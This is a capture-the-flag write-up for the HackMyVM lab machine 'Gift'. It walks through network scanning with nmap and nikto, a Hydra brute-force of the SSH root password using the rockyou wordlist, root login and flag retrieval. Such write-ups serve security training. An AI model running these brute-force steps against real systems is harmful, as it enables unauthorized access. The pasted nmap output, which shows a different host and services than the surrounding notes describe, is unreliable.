Post

Gift Writeup HackMyVM

Alt Text

This process highlights the importance of enumeration and scanning for vulnerabilities to gain initial access to a target system. Through this machine, one can learn the importance of thorough reconnaissance and understanding various tools and techniques for successful penetration testing.

vm link

» Make a new directory for machine and change to that directory
1
2
3
4
5
┌──(kali㉿kali)-[~]
└─$ cd Desktop/gift
                                                                             
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ 

» Find our own IP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ ip a            
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:21:b1:d0 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.136/24 brd 192.168.0.255 scope global dynamic noprefixroute eth0
       valid_lft 6912sec preferred_lft 6912sec
    inet6 fe80::f913:6113:d2c9:4db2/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

» Let’s find the IP address of our target on our virtual network, we can do this with fping

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ fping -ag 192.168.0.136/24 2> /dev/null
192.168.0.1
192.168.0.115
192.168.0.136
192.168.0.142
192.168.0.147
192.168.0.161

» Create a variable for the IP to avoid retyping the address each time

1
2
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ ip=192.168.0.161


Enumeration


» Scan for open ports and services using nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ sudo nmap -sC -sV -T4 -A -O -p- $ip
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-04 11:49 EST
Nmap scan report for 192.168.0.142
Host is up (0.00064s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick Automative
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.0.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.79 seconds
  • Linux: Not yet known which distribution.
  • Port 22: SSH (OpenSSH 8.3).
  • Port 80: HTTP (nginx).
  • Title: The site doesn’t have a title (text/html).

» Enumerate the service using WhatWeb

1
2
3
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ whatweb $ip                             
http://192.168.0.161 [200 OK] Country[RESERVED][ZZ], HTTPServer[nginx], IP[192.168.0.161], nginx

» Let’s open the website in the browser

1
2
3
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ firefox $ip &                          
[1] 31479

Alt Text

» Let’s Nikto with target IP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ nikto -h $ip          
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.0.161
+ Target Hostname:    192.168.0.161
+ Target Port:        80
+ Start Time:         2024-02-08 16:40:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2024-02-08 16:41:11 (GMT-5) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • Nikto discovered something—an #wp-config.php file containing potential credentials. Let’s investigate further.
1
2
3
4
5
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ curl http://$ip/#wp-config.php#

Dont Overthink. Really, Its simple.
        <!-- Trust me -->

» With port 22 open, there is a possibility to attempt brute-forcing the root account using Hydra

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ hydra -l root -P ~/Desktop/wl/rockyou.txt $ip ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-08 16:49:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://192.168.0.161:22/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 14344244 to do in 1532:31h, 14 active
[22][ssh] host: 192.168.0.161   login: root   password: simple
[STATUS] 4781466.00 tries/min, 14344398 tries in 00:03h, 2 to do in 00:01h, 6 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-08 16:52:41
  • -l : login name
  • -P : file path to wordlist


Initial Access


» Let’s login as root via ssh

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ ssh root@$ip                       
The authenticity of host '192.168.0.161 (192.168.0.161)' can't be established.
ED25519 key fingerprint is SHA256:dXsAE5SaInFUaPinoxhcuNloPhb2/x2JhoGVdcF8Y6I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.161' (ED25519) to the list of known hosts.
root@192.168.0.161's password: 
IM AN SSH SERVER
gift:~# 
  • Now that the connection is established, let’s gather information about our identity, roles, and the system we are interacting with.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/Desktop/gift]
└─$ ssh root@$ip                       
root@192.168.0.161's password: 
IM AN SSH SERVER
gift:~# whoami;id;host;ip a; pwd
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
-ash: host: not found
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:26:f2:0d brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.161/24 brd 192.168.0.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe26:f20d/64 scope link 
       valid_lft forever preferred_lft forever
/root
gift:~# 

» Flags

1
2
3
4
5
6
7
8
9
gift:~# ls -l
total 8
----------    1 root     root            12 Sep 24  2020 root.txt
-rw-rw----    1 root     root            12 Sep 24  2020 user.txt
gift:~# cat root.txt
####flag####
gift:~# cat user.txt
####flag####
gift:~# 


pwned
This post is licensed under CC BY 4.0 by the author.